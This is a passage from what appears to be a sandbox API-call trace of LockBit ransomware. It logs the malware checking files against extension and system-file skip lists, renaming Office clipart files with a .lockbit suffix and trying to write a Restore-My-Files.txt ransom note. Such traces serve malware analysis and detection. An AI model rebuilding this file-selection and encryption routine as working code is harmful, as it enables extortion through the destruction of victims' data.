-1 [0139.772] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0139.772] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0139.772] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0139.772] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0139.772] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0139.772] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0139.772] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0139.772] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0139.772] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0139.772] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0139.772] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.772] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0139.772] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0139.772] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0139.772] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0139.772] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107188.WMF") returned 1 [0139.772] lstrcmpiW (lpString1="ntldr", lpString2="J0107188.WMF") returned 1 [0139.772] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107188.WMF") returned 1 [0139.772] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107188.WMF") returned -1 [0139.772] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107188.WMF") returned -1 [0139.772] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107188.WMF") returned 1 [0139.772] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107188.WMF") returned -1 [0139.773] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0139.773] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107188.WMF") returned=".WMF" [0139.773] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0139.773] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0139.773] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0139.773] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0139.773] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0139.773] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0139.773] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0139.773] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0139.773] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0139.773] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0139.773] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0139.773] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0139.773] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0139.773] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0139.773] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0139.773] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0139.773] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0139.773] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0139.773] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0139.773] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0139.773] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0139.773] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0139.773] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0139.773] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0139.773] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0139.773] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0139.773] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0139.773] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0139.773] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107188.WMF.lockbit") returned 72 [0139.773] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107188.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107188.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0139.774] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0139.774] malloc (_Size=0x40068) returned 0x3df0008 [0139.774] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=4536) returned 1 [0139.774] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.775] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.775] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0139.775] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.775] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.775] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0139.775] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.804] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107188.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107188.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0139.804] malloc (_Size=0xa6) returned 0x77d7a8 [0139.804] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0139.882] free (_Block=0x77d7a8) [0139.882] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107188.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0139.882] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0139.882] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0139.882] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5636ddf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x26f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107192.WMF", cAlternateFileName="")) returned 1 [0139.882] lstrcmpiW (lpString1=".", lpString2="J0107192.WMF") returned -1 [0139.882] lstrcmpiW (lpString1="..", lpString2="J0107192.WMF") returned -1 [0139.882] PathFindExtensionW (pszPath="J0107192.WMF") returned=".WMF" [0139.882] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0139.882] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0139.882] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0139.882] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0139.882] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0139.882] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0139.883] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0139.883] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0139.883] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0139.883] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0139.883] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0139.883] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0139.883] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0139.883] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0139.883] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0139.883] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0139.883] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0139.883] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0139.883] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0139.883] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0139.883] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0139.883] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0139.883] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0139.883] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0139.883] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.883] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0139.883] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0139.883] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0139.883] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0139.883] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0139.883] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0139.883] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0139.883] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0139.883] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0139.883] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0139.883] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0139.883] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0139.883] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0139.883] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0139.883] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0139.884] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0139.884] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0139.884] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.884] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0139.884] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0139.884] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0139.884] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0139.884] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107192.WMF") returned 1 [0139.884] lstrcmpiW (lpString1="ntldr", lpString2="J0107192.WMF") returned 1 [0139.884] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107192.WMF") returned 1 [0139.884] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107192.WMF") returned -1 [0139.884] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107192.WMF") returned -1 [0139.884] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107192.WMF") returned 1 [0139.884] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107192.WMF") returned -1 [0139.884] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0139.884] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107192.WMF") returned=".WMF" [0139.884] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0139.884] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0139.884] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0139.884] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0139.884] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0139.884] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0139.884] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0139.884] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0139.884] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0139.884] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0139.884] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0139.884] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0139.884] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0139.884] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0139.884] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0139.885] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0139.885] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0139.885] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0139.885] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0139.885] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0139.885] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0139.885] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0139.885] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0139.885] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0139.885] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0139.885] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0139.885] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0139.885] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0139.885] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107192.WMF.lockbit") returned 72 [0139.885] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107192.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107192.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0139.886] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0139.886] malloc (_Size=0x40068) returned 0x3df0008 [0139.886] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=9968) returned 1 [0139.886] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.887] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0139.887] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.887] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0139.887] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0140.415] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107192.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107192.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0140.415] malloc (_Size=0xa6) returned 0x77d7a8 [0140.415] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0141.408] free (_Block=0x77d7a8) [0141.408] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107192.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0141.408] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0141.408] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0141.408] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5636ddf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4ef4, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107254.WMF", cAlternateFileName="")) returned 1 [0141.408] lstrcmpiW (lpString1=".", lpString2="J0107254.WMF") returned -1 [0141.408] lstrcmpiW (lpString1="..", lpString2="J0107254.WMF") returned -1 [0141.408] PathFindExtensionW (pszPath="J0107254.WMF") returned=".WMF" [0141.408] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0141.409] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0141.409] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0141.409] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0141.409] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0141.409] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0141.409] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0141.409] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0141.409] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0141.409] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0141.409] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0141.409] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0141.409] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0141.409] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0141.409] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0141.409] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0141.409] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0141.409] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0141.409] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0141.409] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0141.409] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0141.409] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0141.409] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0141.409] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0141.409] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.409] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0141.409] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0141.409] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0141.410] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0141.410] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0141.410] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0141.410] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0141.410] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0141.410] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0141.410] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0141.410] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0141.410] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0141.410] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0141.410] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0141.410] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0141.410] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0141.410] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0141.410] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.410] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0141.410] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0141.410] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0141.410] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0141.410] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107254.WMF") returned 1 [0141.410] lstrcmpiW (lpString1="ntldr", lpString2="J0107254.WMF") returned 1 [0141.410] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107254.WMF") returned 1 [0141.410] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107254.WMF") returned -1 [0141.410] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107254.WMF") returned -1 [0141.410] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107254.WMF") returned 1 [0141.411] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107254.WMF") returned -1 [0141.411] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0141.411] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107254.WMF") returned=".WMF" [0141.411] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0141.411] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0141.411] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0141.411] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0141.411] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0141.411] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0141.411] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0141.411] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0141.411] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0141.411] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0141.411] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0141.411] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0141.411] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0141.411] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0141.411] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0141.411] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0141.411] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0141.411] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0141.411] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0141.411] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0141.411] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0141.411] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0141.411] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0141.412] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0141.412] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0141.412] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0141.412] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0141.412] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0141.412] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107254.WMF.lockbit") returned 72 [0141.412] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107254.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107254.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0141.413] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0141.413] malloc (_Size=0x40068) returned 0x3df0008 [0141.413] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=20212) returned 1 [0141.413] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.414] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0141.414] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.414] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0141.415] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0141.420] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107254.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107254.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0141.420] malloc (_Size=0xa6) returned 0x77d7a8 [0141.421] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0141.423] free (_Block=0x77d7a8) [0141.423] PathRemoveFileSpecW (in: pszPath="C:\\\\Program 